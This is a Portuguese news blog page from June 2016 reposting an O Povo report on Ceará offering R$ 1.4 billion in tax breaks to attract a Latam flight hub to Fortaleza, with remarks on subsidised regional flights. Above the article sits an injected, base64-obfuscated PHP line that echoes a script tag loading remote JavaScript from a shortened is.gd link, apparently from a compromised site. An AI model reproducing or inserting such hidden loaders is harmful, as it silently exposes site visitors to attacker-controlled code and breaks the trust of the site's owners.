$str = 'PHNjcmlwdCBzcmM9Imh0dHBzOi8vaXMuZ2QvR2dHZjl6P3Y9djI1LjAiPjwvc2NyaXB0Pg=='; echo base64_decode($str);

Governo do Ceará anuncia R$ 1,4 bilhão em isenção de impostos caso do hub da Latam seja instalado no Estado

Governo do Ceará anuncia R$ 1,4 bilhão em isenção de impostos caso do hub da Latam seja instalado no Estado
13 Jun 2016

Do jornal O Povo:

Governo do Estado e Prefeitura de Fortaleza investem em mais uma estratégia para atrair o centro internacional de conexões de voos (hub) da Latam (fusão entre a chilena LAN e a brasileira TAM) para o Ceará. Caso qualquer hub venha para a Capital, será dada a soma R$ 1,4 bilhão em isenção de impostos estaduais e municipais, no período de 25 anos, para a concessionária que ganhar o leilão do Governo Federal para operar o Aeroporto Internacional Pinto Martins. A ideia é que, além do Governo, a concessionária também lute para atrair o hub.

“A operadora (do aeroporto) vai ter incentivo fiscal de terreno, todo tipo de imposto, mas, desde que uma empresa monte um hub aqui em Fortaleza. Se não, ela vai seguir a vida dela normal. Se não tivermos hub, a concessionária não vai participar dos incentivos fiscais”, explicou Arialdo Pinho, secretário do Turismo do Estado.

 

O secretário ministrou palestra sobre o potencial turístico do Ceará, ontem, nos 15 anos da Câmara Brasil-Portugal no Ceará (CBP-CE), no Hotel Praia Centro. Na ocasião, Arialdo frisou que, para o hub, já tem as licenças ambientais federais, estaduais e municipais de toda a área do aeroporto, para que não haja problemas em uma construção de segunda pista ou terminais que atendam ao centro de conexões.

 

“O hub da Latam, quando chegamos lá, era uma lista que achávamos que era impossível de cumprir”. Ele frisou que, antes, as vantagens eram para o Rio Grande do Norte, mas agora a situação mudou. Isso porque o Ceará já cumpriu todas as exigências da Latam, como colocar o Aeroporto na lista de concessões do Governo, o terreno da Base Aérea e os incentivos fiscais.

 

“É claro que a TAM está esperando a decisão (da concessão) do Ceará. Por isso que ela vem adiando”, afirmou. Para ele, a vinda do centro de conexões de voos para o Nordeste é “inevitável”. Isso porque, segundo calcula, um hub fora do Nordeste custa cerca de U$S 1 bilhão e, na região, esse valor cairia para US$ 400 milhões.

 

Aviação regional

No âmbito da aviação regional, Arialdo disse que quer desenvolver dois voos semanais para Crateús e São Benedito, três semanais para Aracati e voos diários para Jericoacoara. A estratégia para conseguir as frequências seria custeando assentos para companhias aéreas. “Vamos mudar essa ótica dos outros estados de dar incentivo fiscal para combustível (querosene). Eu sou contra”.

 

Para ele, subsidiar assentos de aéreas faz com que elas se sintam estimuladas a promover os destinos turísticos do Ceará. “Vão ter que fazer propaganda, ter que colocar gente dentro para eu poder pagar (o benefício)”.

share

Anna Ruth
Anna Ruth

Anna Ruth Dantas é jornalista, apresentadora do programa RN Acontece, da Band Natal; produz e apresenta o programa Jornal da Cidade, da Rádio Cidade (94 FM - Natal), e apresenta o programa Panorama do RN (em rede com 16 emissoras de rádio do Rio Grande do Norte). Jornalista de grande credibilidade, atua também como consultora e ministra cursos de midia trainning na Trilhar Educação Corporativa.

Deixar uma resposta

O seu endereço de email não será publicado. Campos obrigatórios marcados com *